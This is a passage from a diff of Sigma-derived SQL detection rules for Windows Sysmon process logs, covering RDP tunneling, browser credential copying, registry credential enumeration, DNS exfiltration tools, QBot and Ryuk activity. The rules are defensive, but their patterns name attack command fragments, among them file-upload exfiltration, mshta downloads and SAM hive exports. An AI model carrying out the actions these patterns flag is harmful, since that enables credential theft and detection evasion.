LIKE '%\\*.bac%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bak%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bkf%' ESCAPE '\\') OR ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% stop %' ESCAPE '\\' AND CommandLine LIKE '% /y%' ESCAPE '\\' AND (CommandLine LIKE '%samss%' ESCAPE '\\' OR CommandLine LIKE '%audioendpointbuilder%' ESCAPE '\\' OR CommandLine LIKE '%unistoresvc\\_%' ESCAPE '\\' OR CommandLine LIKE '%AcrSch2Svc%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%:3389%' ESCAPE '\\' AND (CommandLine LIKE '% -L %' ESCAPE '\\' OR CommandLine LIKE '% -P %' ESCAPE '\\' OR CommandLine LIKE '% -R %' ESCAPE '\\' OR CommandLine LIKE '% -pw %' ESCAPE '\\' OR CommandLine LIKE '% -ssh %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_ryuk.yml" + "filename": "proc_creation_win_susp_remote_desktop_tunneling.yml" }, { - "title": "Non Interactive PowerShell Process Spawned", - "id": "f4bbd493-b796-416e-bbf2-121235348529", - "status": "test", - "description": "Detects non-interactive PowerShell activity by looking at powershell.exe with a non user process such as \"explorer.exe\" as a parent.", - "author": "Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)", + "title": "Suspicious Add User to Remote Desktop Users Group", + "id": "ffa28e60-bdb1-46e0-9f82-05f7a61cc06e", + "status": "experimental", + "description": "Detects suspicious command line in which a user gets added to the local Remote Desktop Users group", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.lateral_movement", + "attack.t1133", + "attack.t1136.001", + "attack.t1021.001" ], "falsepositives": [ - "Legitimate programs executing PowerShell scripts" + "Administrative activity" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND NOT (((ParentImage LIKE '%\\\\explorer.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\CompatTelRunner.exe' ESCAPE '\\') OR ParentImage LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\SetupHost.exe' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% --ms-enable-electron-run-as-node %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%localgroup %' ESCAPE '\\' AND CommandLine LIKE '% /add%' ESCAPE '\\') OR (CommandLine LIKE '%Add-LocalGroupMember %' ESCAPE '\\' AND CommandLine LIKE '% -Group %' ESCAPE '\\')) AND (CommandLine LIKE '%Remote Desktop Users%' ESCAPE '\\' OR CommandLine LIKE '%Utilisateurs du Bureau à distance%' ESCAPE '\\' OR CommandLine LIKE '%Usuarios de escritorio remoto%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_non_interactive_execution.yml" + "filename": "proc_creation_win_susp_add_user_remote_desktop_group.yml" }, { - "title": "Potential Baby Shark Malware Activity", - "id": "2b30fa36-3a18-402f-a22d-bf4ce2189f35", + "title": "Exports Critical Registry Keys To a File", + "id": "82880171-b475-4201-b811-e9c826cd5eaa", "status": "test", - "description": "Detects activity that could be related to Baby Shark malware", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the export of a crital Registry key to a file.", + "author": "Oddvar Moe, Sander Wiebing, oscd.community", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.discovery", - "attack.t1012", - "attack.t1059.003", - "attack.t1059.001", - "attack.t1218.005" + "attack.exfiltration", + "attack.t1012" ], "falsepositives": [ - "Unknown" + "Dumping hives for legitimate purpouse i.e. backup or forensic investigation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%powershell.exe mshta.exe http%' ESCAPE '\\' AND CommandLine LIKE '%.hta%' ESCAPE '\\') OR (CommandLine LIKE '%reg query \"HKEY\\_CURRENT\\_USER\\\\Software\\\\Microsoft\\\\Terminal Server Client\\\\Default\"%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c taskkill /im cmd.exe%' ESCAPE '\\' OR CommandLine LIKE '%(New-Object System.Net.WebClient).UploadFile(''http%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND (CommandLine LIKE '% /E %' ESCAPE '\\' OR CommandLine LIKE '% -E %' ESCAPE '\\') AND (CommandLine LIKE '%hklm%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_local\\_machine%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\system' ESCAPE '\\' OR CommandLine LIKE '%\\\\sam' ESCAPE '\\' OR CommandLine LIKE '%\\\\security' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_babyshark.yml" + "filename": "proc_creation_win_regedit_export_critical_keys.yml" }, { - "title": "Change PowerShell Policies to an Insecure Level", - "id": "87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180", + "title": "Potential Browser Data Stealing", + "id": "47147b5b-9e17-4d76-b8d2-7bac24c5ce1b", "status": "experimental", - "description": "Detects use of executionpolicy option to set insecure policies", - "author": "frack113", + "description": "Adversaries may acquire credentials from web browsers by reading files specific to the target browser.\nWeb browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future.\nWeb browsers typically store the credentials in an encrypted format within a credential store.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1555.003" ], "falsepositives": [ - "Administrator script" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '% -executionpolicy %' ESCAPE '\\' OR CommandLine LIKE '% -ep %' ESCAPE '\\' OR CommandLine LIKE '% -exec %' ESCAPE '\\') AND (CommandLine LIKE '%Unrestricted%' ESCAPE '\\' OR CommandLine LIKE '%bypass%' ESCAPE '\\' OR CommandLine LIKE '%RemoteSigned%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%C:\\\\Program Files%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Code\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%copy-item%' ESCAPE '\\' OR CommandLine LIKE '%copy %' ESCAPE '\\' OR CommandLine LIKE '%cpi %' ESCAPE '\\' OR CommandLine LIKE '% cp %' ESCAPE '\\' OR CommandLine LIKE '%move %' ESCAPE '\\' OR CommandLine LIKE '%move-item%' ESCAPE '\\' OR CommandLine LIKE '% mi %' ESCAPE '\\' OR CommandLine LIKE '% mv %' ESCAPE '\\') OR (Image LIKE '%\\\\xcopy.exe' ESCAPE '\\' OR Image LIKE '%\\\\robocopy.exe' ESCAPE '\\') OR OriginalFileName IN ('XCOPY.EXE', 'robocopy.exe')) AND (CommandLine LIKE '%\\\\Opera Software\\\\Opera Stable\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Mozilla\\\\Firefox\\\\Profiles%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Edge\\\\User Data\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Google\\\\Chrome\\\\User Data\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_set_policies_to_unsecure_level.yml" + "filename": "proc_creation_win_susp_copy_browser_data.yml" }, { - "title": "Suspicious ConfigSecurityPolicy Execution", - "id": "1f0f6176-6482-4027-b151-00071af39d7e", + "title": "Enumeration for 3rd Party Creds From CLI", + "id": "87a476dc-0079-4583-a985-dee7a20a03de", "status": "experimental", - "description": "Upload file, credentials or data exfiltration with Binary part of Windows Defender", - "author": "frack113", + "description": "Detects processes that query known 3rd party registry keys that holds credentials via commandline", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1567" + "attack.credential_access", + "attack.t1552.002" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%ConfigSecurityPolicy.exe%' ESCAPE '\\' OR Image LIKE '%\\\\ConfigSecurityPolicy.exe' ESCAPE '\\' OR OriginalFileName = 'ConfigSecurityPolicy.exe') AND (CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%\\\\Software\\\\SimonTatham\\\\PuTTY\\\\Sessions%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\SimonTatham\\\\PuTTY\\\\SshHostKeys\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\Mobatek\\\\MobaXterm\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\WOW6432Node\\\\Radmin\\\\v3.0\\\\Server\\\\Parameters\\\\Radmin%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\Aerofox\\\\FoxmailPreview%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\Aerofox\\\\Foxmail\\\\V3.1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\IncrediMail\\\\Identities%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\Qualcomm\\\\Eudora\\\\CommandLine%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\RimArts\\\\B2\\\\Settings%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\OpenVPN-GUI\\\\configs%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\Martin Prikryl\\\\WinSCP 2\\\\Sessions%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\FTPWare\\\\COREFTP\\\\Sites%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\DownloadManager\\\\Passwords%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\OpenSSH\\\\Agent\\\\Keys%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\TightVNC\\\\Server%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\ORL\\\\WinVNC3\\\\Password%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\RealVNC\\\\WinVNC4%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_configsecuritypolicy.yml" + "filename": "proc_creation_win_registry_enumeration_for_credentials_cli.yml" }, { - "title": "Suspicious OfflineScannerShell.exe Execution From Another Folder", - "id": "02b18447-ea83-4b1b-8805-714a8a34546a", - "status": "test", - "description": "Use OfflineScannerShell.exe to execute mpclient.dll library in the current working directory", - "author": "frack113", + "title": "Service StartupType Change Via Sc.EXE", + "id": "85c312b7-f44d-4a51-a024-d671c40b49fc", + "status": "experimental", + "description": "Detect the use of \"sc.exe\" to change the startup type of a service to \"disabled\" or \"demand\"", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.t1218" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "False positives may occur with troubleshooting scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\OfflineScannerShell.exe' ESCAPE '\\' AND NOT ((CurrentDirectory LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\Offline\\\\' ESCAPE '\\') OR (CurrentDirectory = '')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '% config %' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\' AND (CommandLine LIKE '%disabled%' ESCAPE '\\' OR CommandLine LIKE '%demand%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_offlinescannershell.yml" + "filename": "proc_creation_win_sc_disable_service.yml" }, { - "title": "Audit Policy Tampering Via Auditpol", - "id": "0a13e132-651d-11eb-ae93-0242ac130002", + "title": "DNS Exfiltration and Tunneling Tools Execution", + "id": "98a96a5a-64a0-4c42-92c5-489da3866cb0", "status": "test", - "description": "Threat actors can use auditpol binary to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", - "author": "Janantha Marasinghe (https://github.com/blueteam0ps)", + "description": "Well-known DNS Exfiltration tools execution", + "author": "Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.exfiltration", + "attack.t1048.001", + "attack.command_and_control", + "attack.t1071.004", + "attack.t1132.001" ], "falsepositives": [ - "Administrator or administrator scripts might leverage the flags mentioned in the detection section. Either way, it should always be monitored" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\auditpol.exe' ESCAPE '\\' OR OriginalFileName = 'AUDITPOL.EXE') AND (CommandLine LIKE '%disable%' ESCAPE '\\' OR CommandLine LIKE '%clear%' ESCAPE '\\' OR CommandLine LIKE '%remove%' ESCAPE '\\' OR CommandLine LIKE '%restore%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\iodine.exe' ESCAPE '\\' OR Image LIKE '%\\\\dnscat2%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_auditpol_susp_execution.yml" + "filename": "proc_creation_win_dns_exfiltration_tools_execution.yml" }, { - "title": "Potential QBot Activity", - "id": "4fcac6eb-0287-4090-8eea-2602e4c20040", - "status": "stable", - "description": "Detects potential QBot activity by looking for process executions used previously by QBot", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.execution", - "attack.t1059.005" - ], + "title": "Gzip Archive Decode Via PowerShell", + "id": "98767d61-b2e8-4d71-b661-e36783ee24c1", + "status": "experimental", + "description": "Detects attempts of decoding encoded Gzip archives via PowerShell.", + "author": "Hieu Tran", "falsepositives": [ - "Unlikely" + "Legitimate administrative scripts may use this functionality. Use \"ParentImage\" in combination with the script names and allowed users and applications to filter legitimate executions" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\WinRAR.exe' ESCAPE '\\' AND Image LIKE '%\\\\wscript.exe' ESCAPE '\\') OR CommandLine LIKE '% /c ping.exe -n 6 127.0.0.1 & type %' ESCAPE '\\' OR (CommandLine LIKE '%regsvr32.exe%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData%' ESCAPE '\\' AND CommandLine LIKE '%.tmp%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%GZipStream%' ESCAPE '\\' AND CommandLine LIKE '%::Decompress%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_qbot.yml" + "filename": "proc_creation_win_powershell_decode_gzip.yml" }, { - "title": "Dism Remove Online Package", - "id": "43e32da2-fdd0-4156-90de-50dfd62636f9", + "title": "Use of Scriptrunner.exe", + "id": "64760eef-87f7-4ed3-93fd-655668ea9420", "status": "experimental", - "description": "Deployment Image Servicing and Management tool. DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images", - "author": "frack113", + "description": "The \"ScriptRunner.exe\" binary can be abused to proxy execution through it and bypass possible whitelisting", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.t1218" ], "falsepositives": [ - "Legitimate script" + "Legitimate use when App-v is deployed" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\DismHost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%/Online%' ESCAPE '\\' AND ParentCommandLine LIKE '%/Disable-Feature%' ESCAPE '\\') OR (Image LIKE '%\\\\Dism.exe' ESCAPE '\\' AND CommandLine LIKE '%/Online%' ESCAPE '\\' AND CommandLine LIKE '%/Disable-Feature%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ScriptRunner.exe' ESCAPE '\\' OR OriginalFileName = 'ScriptRunner.exe') AND CommandLine LIKE '% -appvscript %' ESCAPE '\\')" ], - "filename": "proc_creation_win_dsim_remove.yml" + "filename": "proc_creation_win_lolbin_scriptrunner.yml" }, { - "title": "Add SafeBoot Keys Via Reg Utility", - "id": "d7662ff6-9e97-4596-a61d-9839e32dee8d", + "title": "Use Short Name Path in Image", + "id": "a96970af-f126-420d-90e1-d37bf25e50e1", "status": "experimental", - "description": "Detects execution of \"reg.exe\" commands with the \"add\" or \"copy\" flags on safe boot registry keys. Often used by attacker to allow the ransomware to work in safe mode as some security products do not", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image detection", + "author": "frack113, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1564.004" ], "falsepositives": [ - "Unlikely" + "Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot%' ESCAPE '\\' AND (CommandLine LIKE '% copy %' ESCAPE '\\' OR CommandLine LIKE '% add %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%~1\\\\%' ESCAPE '\\' OR Image LIKE '%~2\\\\%' ESCAPE '\\') AND NOT (((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\Dism.exe' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\cleanmgr.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\thor\\\\thor64.exe' ESCAPE '\\') OR Product = 'InstallShield (R)' OR Description = 'InstallShield (R) Setup Engine' OR Company = 'InstallShield Software Corporation') OR (Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR (Image LIKE '%~1\\\\unzip.exe' ESCAPE '\\' OR Image LIKE '%~1\\\\7zG.exe' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_reg_add_safeboot.yml" + "filename": "proc_creation_win_susp_ntfs_short_name_path_use_image.yml" }, { - "title": "Suspicious Cmdl32 Execution", - "id": "f37aba28-a9e6-4045-882c-d5004043b337", - "status": "experimental", - "description": "lolbas Cmdl32 is use to download a payload to evade antivirus", - "author": "frack113", + "title": "Invoke-Obfuscation CLIP+ Launcher", + "id": "b222df08-0e07-11eb-adc1-0242ac120002", + "status": "test", + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1218", - "attack.t1202" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmdl32.exe' ESCAPE '\\' OR OriginalFileName = 'CMDL32.EXE') AND (CommandLine LIKE '%/vpn %' ESCAPE '\\' AND CommandLine LIKE '%/lan %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND CommandLine LIKE '%clipboard]::%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_cmdl32.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_clip.yml" }, { - "title": "Suspicious CMD Shell Output Redirect", - "id": "8e0bb260-d4b2-4fff-bb8d-3f82118e6892", + "title": "Suspicious WindowsTerminal Child Processes", + "id": "8de89e52-f6e1-4b5b-afd1-41ecfa300d48", "status": "experimental", - "description": "Detects inline windows shell commands redirecting output via the \">\" symbol to a suspicious location", + "description": "Detects suspicious children spawned via the Windows Terminal application which could be a sign of persistence via WindowsTerminal (see references section)", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1218" + "attack.persistence" ], "falsepositives": [ - "Legitimate admin scripts" + "Other legitimate \"Windows Terminal\" profiles" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND ((CommandLine LIKE '%> \\%USERPROFILE\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> \\%APPDATA\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> \\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> \\%TEMP\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> \\%TMP\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> C:\\\\Temp\\\\%' ESCAPE '\\') OR ((CommandLine LIKE '% > %' ESCAPE '\\' OR CommandLine LIKE '% >> %' ESCAPE '\\') AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\WindowsTerminal.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wt.exe' ESCAPE '\\') AND ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\csc.exe' ESCAPE '\\') OR (Image LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\') OR (CommandLine LIKE '% iex %' ESCAPE '\\' OR CommandLine LIKE '% icm%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module %' ESCAPE '\\' OR CommandLine LIKE '%ipmo %' ESCAPE '\\' OR CommandLine LIKE '%DownloadString(%' ESCAPE '\\' OR CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% /k %' ESCAPE '\\' OR CommandLine LIKE '% /r %' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '%Import-Module%' ESCAPE '\\' AND CommandLine LIKE '%Microsoft.VisualStudio.DevShell.dll%' ESCAPE '\\' AND CommandLine LIKE '%Enter-VsDevShell%' ESCAPE '\\') OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Packages\\\\Microsoft.WindowsTerminal\\_%' ESCAPE '\\' AND CommandLine LIKE '%\\\\LocalState\\\\settings.json%' ESCAPE '\\') OR (CommandLine LIKE '%C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Common7\\\\Tools\\\\VsDevCmd.bat%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_cmd_redirection_susp_folder.yml" + "filename": "proc_creation_win_windows_terminal_susp_children.yml" }, { - "title": "Potential Commandline Obfuscation Using Escape Characters", - "id": "f0cdd048-82dc-4f7a-8a7a-b87a52b6d0fd", + "title": "Suspicious PowerShell Invocation From Script Engines", + "id": "95eadcb2-92e4-4ed1-9031-92547773a6db", "status": "test", - "description": "Detects potential commandline obfuscation using known escape characters", - "author": "juju4", + "description": "Detects suspicious powershell invocations from interpreters or unusual programs", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1140" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Microsoft Operations Manager (MOM)", + "Other scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%h^t^t^p%' ESCAPE '\\' OR CommandLine LIKE '%h\"t\"t\"p%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND NOT ((CurrentDirectory LIKE '%\\\\Health Service State\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_cli_obfuscation_escape_char.yml" + "filename": "proc_creation_win_powershell_script_engine_parent.yml" }, { - "title": "Use Short Name Path in Image", - "id": "a96970af-f126-420d-90e1-d37bf25e50e1", - "status": "experimental", - "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image detection", - "author": "frack113, Nasreddine Bencherchali", + "title": "New Service Creation Using PowerShell", + "id": "c02e96b7-c63a-4c47-bd83-4a9f74afcfb2", + "status": "test", + "description": "Detects the creation of a new service using powershell.", + "author": "Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1564.004" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - "Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process." + "Legitimate administrator or user creates a service for legitimate reasons.", + "Software installation" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%~1\\\\%' ESCAPE '\\' OR Image LIKE '%~2\\\\%' ESCAPE '\\') AND NOT (((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\Dism.exe' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\cleanmgr.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\thor\\\\thor64.exe' ESCAPE '\\') OR Product = 'InstallShield (R)' OR Description = 'InstallShield (R) Setup Engine' OR Company = 'InstallShield Software Corporation') OR (Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR (Image LIKE '%~1\\\\unzip.exe' ESCAPE '\\' OR Image LIKE '%~1\\\\7zG.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%New-Service%' ESCAPE '\\' AND CommandLine LIKE '%-BinaryPathName%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_ntfs_short_name_path_use_image.yml" + "filename": "proc_creation_win_powershell_create_service.yml" }, { - "title": "Potential Remote Desktop Tunneling", - "id": "8a3038e8-9c9d-46f8-b184-66234a160f6f", + "title": "New Remote 